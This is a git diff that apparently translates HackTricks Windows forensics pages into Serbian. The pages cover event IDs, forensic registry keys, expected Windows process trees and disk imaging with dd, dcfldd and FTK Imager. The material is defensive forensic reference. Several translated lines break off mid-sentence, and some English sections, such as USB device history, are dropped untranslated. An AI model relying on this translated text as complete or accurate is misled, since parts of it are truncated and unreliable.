+Za praktične primere simuliranja ovih vrsta prijavljivanja i prilika za izvlačenje akreditiva, pogledajte detaljan vodič [Altered Security](https://www.alteredsecurity
+#### Događaji o napajanju sistema
-Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625.
+EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje.
-### Recovering Windows Events
+#### Brisanje logova
-To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events.
-
-### Identifying Common Attacks via Windows Events
-
-For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/).
-
-#### Brute Force Attacks
-
-Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds.
-
-#### Time Change
-
-Recorded by EventID 4616, changes to system time can complicate forensic analysis.
-
-#### USB Device Tracking
-
-Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps.
-
-#### System Power Events
-
-EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
-
-#### Log Deletion
-
-Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis.
+Security EventID 1102 signalizira brisanje logova, što je kritičan događaj za forenzičku analizu.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju oglašenu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
index 593954531..a2fc5eadd 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
@@ -1,106 +1,83 @@
-# Interesting Windows Registry Keys
+# Interesantni Windows registarski ključevi
-### Interesting Windows Registry Keys
+### Interesantni Windows registarski ključevi
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju oglašenu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-### **Windows Version and Owner Info**
-- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner.
+### **Windows verzija i informacije o vlasniku**
+- Na lokaciji **`Software\Microsoft\Windows NT\CurrentVersion`**, možete pronaći Windows verziju, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način.
-### **Computer Name**
-- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**.
+### **Ime računara**
+- Hostname se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**.
-### **Time Zone Setting**
-- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**.
+### **Podešavanje vremenske zone**
+- Vremenska zona sistema se čuva u **`System\ControlSet001\Control\TimeZoneInformation`**.
-### **Access Time Tracking**
-- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use:
- `fsutil behavior set disablelastaccess 0`
+### **Pracenje vremena pristupa**
+- Prema zadanim postavkama, praćenje vremena poslednjeg pristupa je isključeno (**`NtfsDisableLastAccessUpdate=1`**). Da biste ga omogućili, koristite:
+`fsutil behavior set disablelastaccess 0`
-### Windows Versions and Service Packs
-- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features.
+### Windows verzije i Service Pack-ovi
+- **Windows verzija** označava izdanje (npr. Home, Pro) i njegovo izdanje (npr. Windows 10, Windows 11), dok su **Service Pack-ovi** ažuriranja koja uključuju ispravke i ponekad nove funkcije.
-### Enabling Last Access Time
-- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring.
+### Omogućavanje praćenja vremena poslednjeg pristupa
+- Omogućavanje praćenja vremena poslednjeg pristupa omogućava vam da vidite kada su datoteke poslednji put otvorene, što može biti ključno za forenzičku analizu ili praćenje sistema.
-### Network Information Details
-- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions.
+### Detalji o mrežnim informacijama
+- Registar sadrži obimne podatke o mrežnim konfiguracijama, uključujući **vrste mreža (bežične, kablovske, 3G)** i **kategorije mreže (Javna, Privatna/Kućna, Domen/Posao)**, što je važno za razumevanje postavki mrežne sigurnosti i dozvola.
-### Client Side Caching (CSC)
-- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity.
+### Klijentsko keširanje (CSC)
+- **CSC** poboljšava pristup datotekama van mreže keširanjem kopija deljenih datoteka. Različite postavke **CSCFlags** kontrolišu način i koje datoteke se keširaju, što utiče na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom konekcijom.
-### AutoStart Programs
-- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software.
+### Programi koji se automatski pokreću
+- Programi navedeni u različitim registarskim ključevima `Run` i `RunOnce` automatski se pokreću prilikom pokretanja sistema, utičući na vreme pokretanja sistema i potencijalno predstavljajući tačke interesa za identifikaciju malvera ili neželjenog softvera.
### Shellbags
-- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. They are invaluable for investigations, revealing user activity that isn't obvious through other means.
+- **Shellbags** ne samo da čuvaju postavke za prikaz fascikli, već pružaju i forenzičke dokaze o pristupu fasciklama čak i ako fascikla više ne postoji. Oni su neprocenjivi za istrage, otkrivajući korisničku aktivnost koja nije očigledna na druge načine.
-### USB Information and Forensics
-- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents.
+### Informacije i forenzika o USB uređajima
+- Detalji o USB uređajima koji se čuvaju u registru mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa prenosom osetljivih datoteka ili incidentima neovlašćenog pristupa.
-### Volume Serial Number
-- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices.
+### Serijski broj zapremine
+- **Serijski broj zapremine** može biti ključan za praćenje specifične instance sistema datoteka, korisno u forenzičkim scenarijima gde je potrebno utvrditi poreklo datoteke na različitim uređajima.
-### **Shutdown Details**
-- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**.
+### **Detalji o isključivanju**
+- Vreme isključivanja i broj isključivanja (samo za XP) čuvaju se u **`System\ControlSet001\Control\Windows`** i **`System\ControlSet001\Control\Watchdog\Display`**.
-### **Network Configuration**
-- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
-- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
+### **Konfiguracija mreže**
+- Za detaljne informacije o mrežnom interfejsu, pogledajte **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
+- Prva i poslednja vremena povezivanja na mrežu, uključujući VPN veze, beleže se pod različitim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
-### **Shared Folders**
-- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability.
+### **Deljene fascikle**
+- Deljene fascikle i postavke nalaze se pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Postavke klijentskog keširanja (CSC) određuju dostupnost datoteka van mreže.
-### **Programs that Start Automatically**
-- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup.
+### **Programi koji se automatski pokreću**
+- Putanje poput **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** i slični unosi pod `Software\Microsoft\Windows\CurrentVersion` detaljno opisuju programe koji se pokreću prilikom pokretanja sistema.
-### **Searches and Typed Paths**
-- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively.
+### **Pretrage i uneti putovi**
+- Pretrage i uneti putovi u Explorer-u se prate u registru pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, redom.
-### **Recent Documents and Office Files**
-- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths.
+### **Nedavni dokumenti i Office datoteke**
+- Nedavno korišćeni dokumenti i Office datoteke se beleže u `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` i specifičnim putanjama za verzije Office-a.
-### **Most Recently Used (MRU) Items**
-- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`.
+### **Najskorije korišćene (MRU) stavke**
+- Liste MRU, koje pokazuju nedavne putanje do datoteka i komande, čuvaju se u različitim podključevima `ComDlg32` i `Explorer` pod `NTUSER.DAT`.
-### **User Activity Tracking**
-- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
+### **Pracenje korisničke aktivnosti**
+- Funkcija User Assist beleži detaljne statistike o korišćenju aplikacija, uključujući broj pokretanja i vreme poslednjeg pokretanja, na lokaciji **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
-### **Shellbags Analysis**
-- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis.
-
-### **USB Device History**
-- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps.
-- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**.
-- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively.
-
-This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability.
-
-
-
-
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
+### **Analiza Shellbags-a**
+- Shellbags, koji otkrivaju detalje o pristupu fasciklama
diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
index b7d5d37fb..266baa9d9 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
@@ -1,16 +1,14 @@
-
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite videti **oglašavanje vaše kompanije na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
@@ -18,130 +16,122 @@ Other ways to support HackTricks:
## smss.exe
**Session Manager**.\
-Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree.
+Sesija 0 pokreće **csrss.exe** i **wininit.exe** (**OS** **servisi**), dok sesija 1 pokreće **csrss.exe** i **winlogon.exe** (**Korisnička** **sesija**). Međutim, trebali biste videti **samo jedan proces** te **izvršne datoteke** bez potomaka u stablu procesa.
-Also, sessions apart from 0 and 1 may mean that RDP sessions are occurring.
+Takođe, sesije osim 0 i 1 mogu značiti da se dešavaju RDP sesije.
## csrss.exe
**Client/Server Run Subsystem Process**.\
-It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps drive letters**, create **temp files**, and handles the **shutdown** **process**.
+Upravlja **procesima** i **nitima**, čini **Windows** **API** dostupnim drugim procesima i takođe **mapira pogonska slova**, kreira **privremene datoteke** i upravlja **procesom za gašenje**.
-There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree). Another one is created **per new Session**.
+Postoji jedan koji radi u sesiji 0 i još jedan u sesiji 1 (tako da ima **2 procesa** u stablu procesa). Još jedan se kreira **po novoj sesiji**.
## winlogon.exe
**Windows Logon Process**.\
-It's responsible for user **logon**/**logoffs**. It launches **logonui.exe** to ask for username and password and then calls **lsass.exe** to verify them.
+Odgovoran je za prijavu/odjavu korisnika. Pokreće **logonui.exe** da zatraži korisničko ime i lozinku, a zatim poziva **lsass.exe** da ih proveri.
-Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**.
+Zatim pokreće **userinit.exe** koji je naveden u **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** sa ključem **Userinit**.
-Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**.
+Osim toga, prethodni registar treba da ima **explorer.exe** u **Shell ključu** ili se može zloupotrebiti kao **metoda za trajno prisustvo malvera**.
## wininit.exe
**Windows Initialization Process**. \
-It launches **services.exe**, **lsass.exe**, and **lsm.exe** in Session 0. There should only be 1 process.
+Pokreće **services.exe**, **lsass.exe** i **lsm.exe** u sesiji 0. Trebao bi postojati samo 1 proces.
## userinit.exe
**Userinit Logon Application**.\
-Loads the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**.
+Učitava **ntuser.dat u HKCU** i inicijalizuje **korisničko okruženje** i pokreće **logon skripte** i **GPO**.
-It launches **explorer.exe**.
+Pokreće **explorer.exe**.
## lsm.exe
**Local Session Manager**.\
-It works with smss.exe to manipulate user sessions: Logon/logoff, shell start, lock/unlock desktop, etc.
+Sarađuje sa smss.exe da manipuliše korisničkim sesijama: prijava/odjava, pokretanje ljuske, zaključavanje/otključavanje radne površine, itd.
-After W7 lsm.exe was transformed into a service (lsm.dll).
+Nakon W7, lsm.exe je pretvoren u servis (lsm.dll).
-There should only be 1 process in W7 and from them a service running the DLL.
+Treba postojati samo 1 proces u W7 i od njih jedan servis koji pokreće DLL.
## services.exe
**Service Control Manager**.\
-It **loads** **services** configured as **auto-start** and **drivers**.
+Učitava **servise** konfigurisane kao **auto-start** i **drajvere**.
-It's the parent process of **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** and many more.
+To je nadređeni proces za **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** i mnoge druge.
-Services are defined in `HKLM\SYSTEM\CurrentControlSet\Services` and this process maintains a DB in memory of service info that can be queried by sc.exe.
+Servisi su definisani u `HKLM\SYSTEM\CurrentControlSet\Services`, a ovaj proces održava bazu podataka u memoriji sa informacijama o servisu koju može pretraživati sc.exe.
-Note how **some** **services** are going to be running in a **process of their own** and others are going to be **sharing a svchost.exe process**.
+Primetite kako će **neki servisi** raditi u **svom sopstvenom procesu** a drugi će **deliti svchost.exe proces**.
-There should only be 1 process.
+Treba postojati samo 1 proces.
## lsass.exe
**Local Security Authority Subsystem**.\
-It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`.
+Odgovoran je za autentifikaciju korisnika i kreiranje **bezbednosnih tokena**. Koristi autentifikacione pakete smeštene u `HKLM\System\CurrentControlSet\Control\Lsa`.
-It writes to the **Security** **event** **log** and there should only be 1 process.
+Upisuje u **bezbednosni događajni zapis** i trebao bi postojati samo 1 proces.
-Keep in mind that this process is highly attacked to dump passwords.
+Imajte na umu da je ovaj proces često napadan kako bi se izvukle lozinke.
## svchost.exe
**Generic Service Host Process**.\
-It hosts multiple DLL services in one shared process.
+Hostuje više DLL servisa u jednom deljenom procesu.
-Usually, you will find that **svchost.exe** is launched with the `-k` flag. This will launch a query to the registry **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process.
+Obično ćete primetiti da se **svchost.exe** pokreće sa zastavicom `-k`. To će pokrenuti upit u registar **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** gde će biti ključ sa argumentom navedenim u -k koji će sadržati servise za pokretanje u istom procesu.
-For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
+Na primer: `-k UnistackSvcGroup` će pokrenuti: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
-If the **flag `-s`** is also used with an argument, then svchost is asked to **only launch the specified service** in this argument.
+Ako se koristi i **zastavica `-s`** sa argumentom, tada se od svchost-a traži da **samo pokrene navedeni servis** u ovom argumentu.
-There will be several processes of `svchost.exe`. If any of them is **not using the `-k` flag**, then that's very suspicious. If you find that **services.exe is not the parent**, that's also very suspicious.
+Biće nekoliko procesa `svchost.exe`. Ako neki od njih **ne koristi zastavicu `-k`**, to je vrlo sumnjivo. Ako otkrijete da **services.exe nije roditelj**, to je takođe vrlo sumnjivo.
## taskhost.exe
-This process act as a host for processes running from DLLs. It also loads the services that are running from DLLs.
+Ovaj proces deluje kao domaćin za procese koji se pokreću iz DLL-ova. Takođe učitava servise koji se pokreću iz DLL-ova.
-In W8 this is called taskhostex.exe and in W10 taskhostw.exe.
+U W8 se naziva taskhostex.exe, a u W10 taskhostw.exe.
## explorer.exe
-This is the process responsible for the **user's desktop** and launching files via file extensions.
+Ovo je proces odgovoran za **korisnički radnu površinu** i pokretanje datoteka putem ekstenzija.
-**Only 1** process should be spawned **per logged on user.**
+Trebao bi biti pokrenut **samo 1** proces **po prijavljenom korisniku**.
-This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process.
+Pokreće se iz **userinit.exe** koji bi trebao biti završen, tako da za ovaj proces **ne bi trebalo da postoji roditelj**.
-# Catching Malicious Processes
+# Otkrivanje zlonamernih procesa
-* Is it running from the expected path? (No Windows binaries run from temp location)
-* Is it communicating with weird IPs?
-* Check digital signatures (Microsoft artifacts should be signed)
-* Is it spelled correctly?
-* Is running under the expected SID?
-* Is the parent process the expected one (if any)?
-* Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?)
+* Pokreće li se iz očekivane putanje? (Nijedna Windows izvršna datoteka ne radi sa privremene lokacije)
+* Da li komunicira sa čudnim IP adresama?
+* Proverite digitalne potpise (Microsoft artefakti trebaju biti potpisani)
+* Da li je pravilno napisano?
+* Da li se izvršava pod očekivanim SID-om?
+* Da li je roditeljski proces očekivani (ako postoji)?
+* Da li su dečiji procesi očekivani? (nema cmd.exe, wscript.exe, powershell.exe..?)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
+Drugi načini podrške HackTricks-u:
+* Ako želite videti **oglašavanje vaše kompanije na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
index ebacbbf4d..696bdd17f 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
@@ -1,46 +1,41 @@
-# Image Acquisition & Mount
+# Akvizicija slike i montiranje
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Da li radite u **cybersecurity kompaniji**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks-u**? Ili želite da imate pristup **najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu**? Proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili me **pratite** na **Twitter-u** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na [hacktricks repo](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Acquisition
+## Akvizicija
### DD
-
```bash
#This will generate a raw copy of the disk
dd if=/dev/sdb of=disk.img
```
-
### dcfldd
+dcfldd je napredni alat za kopiranje i konverziju slika. On pruža dodatne funkcionalnosti u odnosu na standardni dd alat, kao što su mogućnost prikaza napretka kopiranja, automatsko generisanje kontrolnih suma i mogućnost rada sa više izvora i odredišta istovremeno. Ovaj alat je veoma koristan prilikom akvizicije slika i kopiranja podataka sa oštećenih medija.
```bash
#Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data)
dcfldd if= of= bs=512 hash= hashwindow= hashlog=
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
-
### FTK Imager
-You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
-
+Možete [**preuzeti FTK imager odavde**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
```bash
ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name'
```
-
### EWF
-You can generate a disk image using the[ **ewf tools**](https://github.com/libyal/libewf).
-
